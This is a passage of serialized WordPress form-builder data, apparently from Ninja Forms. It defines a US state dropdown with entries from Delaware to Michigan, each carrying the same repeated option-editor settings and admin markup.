Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Delaware\";s:5:\"value\";s:2:\"DE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:9;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:20:\"District of Columbia\";s:5:\"value\";s:2:\"DC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Florida\";s:5:\"value\";s:2:\"FL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:11;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Georgia\";s:5:\"value\";s:2:\"GA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:12;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Hawaii\";s:5:\"value\";s:2:\"HI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Idaho\";s:5:\"value\";s:2:\"ID\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:14;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Illinois\";s:5:\"value\";s:2:\"IL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:15;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Indiana\";s:5:\"value\";s:2:\"IN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:16;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Iowa\";s:5:\"value\";s:2:\"IA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:17;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Kansas\";s:5:\"value\";s:2:\"KS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:18;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Kentucky\";s:5:\"value\";s:2:\"KY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:19;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Louisiana\";s:5:\"value\";s:2:\"LA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:20;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Maine\";s:5:\"value\";s:2:\"ME\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:21;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Maryland\";s:5:\"value\";s:2:\"MD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:22;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"Massachusetts\";s:5:\"value\";s:2:\"MA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:23;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Michigan\";s:5:\"value\";s:2:\"MI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 